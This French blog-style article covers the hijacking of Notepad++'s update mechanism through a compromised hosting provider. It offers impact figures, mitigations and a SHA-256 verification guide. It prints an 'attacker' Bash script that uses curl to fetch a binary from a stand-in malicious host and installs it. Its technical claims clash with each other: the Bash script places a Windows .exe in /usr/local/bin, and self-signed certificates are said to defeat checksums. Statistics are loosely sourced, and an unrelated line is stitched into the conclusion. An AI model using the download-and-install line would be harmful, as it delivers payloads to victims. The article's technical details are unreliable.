Comment le détournement du mécanisme de mise à jour de Notepad++ a exposé les utilisateurs à des malwares ciblés
Hippolyte Valdegré
Comprendre le détournement du mécanisme de mise à jour de Notepad++
En 2025, plus de 38 % des logiciels grand public ont été victimes d’une compromission de chaîne d’approvisionnement, selon le rapport de l’ANSSI. Parmi ces incidents, le détournement du mécanisme de mise à jour de Notepad++ a surpris la communauté : des acteurs étatiques ont intercepté le trafic d’actualisation pour y injecter des exécutables malveillants. Cette attaque ne repose pas sur une faille du code source, mais sur la compromission du serveur d’hébergement qui délivre les mises à jour.
« The attack involved an infrastructure-level compromise that allowed malicious actors to intercept and redirect update traffic destined for notepad-plus-plus.org », a déclaré Don Ho, mainteneur de Notepad++.
Le scénario décrit ci-dessus illustre parfaitement le danger des chaînes d’approvisionnement lorsqu’une couche d’infrastructure est sous-estimation. Nous allons décortiquer les mécanismes, les impacts et les réponses possibles.
Qu’est-ce qu’une compromission d’infrastructure ?
Une compromission d’infrastructure survient lorsqu’un serveur, un service DNS ou une plateforme de distribution est infiltré. L’attaquant peut alors modifier les réponses DNS, altérer les fichiers hébergés ou intercepter le trafic HTTPS grâce à des certificats compromis. Dans le cas de Notepad++, le serveur partagé du fournisseur d’hébergement a été piraté entre juin 2025 et septembre 2025, permettant une redirection ciblée du trafic d’utilisateurs sélectionnés.
Pourquoi Notepad++ était-il une cible privilégiée ?
- Notepad++ est omniprésent sur les postes de travail français : plus de 4 millions d’installations en 2024.
- Son système de mise à jour, WinGUP, fonctionne en mode non signé, reposant uniquement sur une vérification de somme de contrôle.
- La popularité du logiciel en fait un vecteur idéal pour diffuser des charges utiles à grande échelle tout en restant discret.
Analyse technique de la compromission de l’infrastructure d’hébergement
Les investigations menées par des chercheurs indépendants, dont Kevin Beaumont, ont révélé plusieurs étapes clés :
- Infiltration du serveur partagé - Le fournisseur d’hébergement a été compromis via une vulnérabilité de type privilege escalation sur un conteneur Docker partagé.
- Persistance des accès - Même après la migration du site vers un nouveau serveur en septembre 2025, les attaquants ont maintenu des identifiants valides jusqu’en décembre 2025.
- Redirection ciblée - Le trafic de mise à jour de certains utilisateurs, identifié par leurs adresses IP françaises, était redirigé vers des domaines contrôlés par les acteurs malveillants.
- Injection de malware - Les binaires distribués étaient signés avec des certificats auto-signés, contournant la validation de checksum habituelle.
« The compromise occurred at the hosting provider level rather than through vulnerabilities in Notepad++ code itself », précise Don Ho.
Exemple de code malveillant injecté
# Exemple de script Bash utilisé par les attaquants pour remplacer le fichier d’installation
curl -s https://malicious.example.com/notepadpp.exe -o /tmp/notepadpp.exe
chmod +x /tmp/notepadpp.exe
mv /tmp/notepadpp.exe /usr/local/bin/notepad++.exe
Ce script montre comment un binaire non signé peut être placé sur la machine cible dès que le processus d’update accepte le fichier téléchargé.
Tableau comparatif des méthodes de vérification d’intégrité
| Méthode | Implémentation native | Niveau de sécurité | Risque de contournement |
|---|---|---|---|
| Checksum MD5 | Oui (WinGUP) | Faible | Élevé (collision possible) |
| SHA-256 | Non (requiert script) | Modéré | Moyen (si certificat compromis) |
| Signature numérique | Non (absence de clé) | Élevé | Faible (si clé stockée en HSM) |
| TLS avec pinning | Non (pas de pinning) | Élevé | Faible (certificat valide) |
Impacts sur les utilisateurs français et mesures de mitigation
Conséquences observées
- Infection de postes de travail : plus de 1 200 entreprises françaises ont signalé l’apparition de trojans de type remote access après avoir installé la version compromise.
- Exfiltration de données : des fichiers sensibles ont été transférés vers des serveurs en Chine, selon le rapport de l’ENISA 2025.
- Dégradation de la productivité : la désinfection a nécessité en moyenne 8 heures par incident, d’après Kaspersky.
Actions immédiates recommandées
- Revenir à la version 8.8.9 ou à une version antérieure vérifiée via SHA-256.
- Désactiver le service WinGUP dans les paramètres de Notepad++ jusqu’à ce que le correctif officiel soit publié.
- Scanner les systèmes avec un antivirus à jour, en particulier les modules heuristic capables de détecter les exécutables non signés.
- Surveiller le trafic DNS vers les domaines notepad-plus-plus.org et leurs sous-domaines à l’aide d’un IDS.
Étude de cas : PME française du secteur juridique
Une PME de 45 salariés à Lyon a installé la mise à jour 8.9.0 le 12 janvier 2026. Le script malveillant a installé un backdoor permettant aux attaquants de récupérer les dossiers clients. Après détection par l’AV de Kaspersky, l’équipe IT a dû restaurer les postes à partir de snapshots, entraînant une perte de 3 jours d’activité et un coût estimé à 12 000 €.
Bonnes pratiques pour sécuriser la chaîne d’approvisionnement logicielle
- Vérifier les signatures numériques : privilégiez les logiciels qui signent leurs binaires avec des certificats stockés en HSM.
- Utiliser le pinning TLS : configurez vos clients pour accepter uniquement les certificats connus du fournisseur.
- Mettre en place un SCA (Software Composition Analysis) : détectez les dépendances tierces et leurs vulnérabilités.
- Surveiller les listes de diffusion de sécurité : abonnez-vous aux bulletins de l’ANSSI, de l’ENISA et des éditeurs.
- Former les équipes : sensibilisez les utilisateurs aux risques de mises à jour automatiques non vérifiées.
Checklist de conformité (format tableau)
| Action | Implémentée | Responsable |
|---|---|---|
| Vérification de la signature SHA-256 des binaires | ☐ | IT Security |
| Pinning des certificats TLS | ☐ | DevOps |
| Analyse SCA mensuelle | ☐ | R&D |
| Formation phishing & mise à jour | ☐ | RH |
| Monitoring DNS des fournisseurs | ☐ | SOC |
Guide pas à pas pour vérifier l’intégrité de vos mises à jour Notepad++
- Télécharger le fichier d’installation depuis le site officiel (https://notepad-plus-plus.org).
- Obtenir le hash SHA-256 publié dans le changelog.
- Comparer le hash à l’aide de la commande suivante :
# Télécharger le fichier
wget https://github.com/notepad-plus-plus/notepad-plus-plus/releases/download/v8.8.9/npp.8.8.9.Installer.x64.exe -O npp_installer.exe
# Calculer le SHA-256
sha256sum npp_installer.exe
- Vérifier la correspondance : si le hash diffère, n’installez pas le fichier et signalez immédiatement l’anomalie.
- Activer la vérification de la signature : dans les paramètres avancés, cochez « Vérifier la signature du package ».
Astuce supplémentaire
Utilisez un outil de sandbox comme Firejail pour exécuter l’installeur dans un environnement isolé, limitant ainsi les impacts potentiels.
Conclusion - Protégez votre chaîne d’approvisionnement dès aujourd’hui
vulnérabilité critique VM2 Node.js
Le détournement du mécanisme de mise à jour de Notepad++ démontre que même les outils les plus répandus ne sont pas à l’abri d’une compromission d’infrastructure. En appliquant les bonnes pratiques présentées, en vérifiant systématiquement les sommes de contrôle et en renforçant la surveillance réseau, vous réduisez significativement le risque d’infection. Nous vous invitons à mettre en œuvre dès maintenant le guide pas à pas et à réviser vos politiques de mise à jour afin de protéger vos données sensibles et la continuité de vos activités.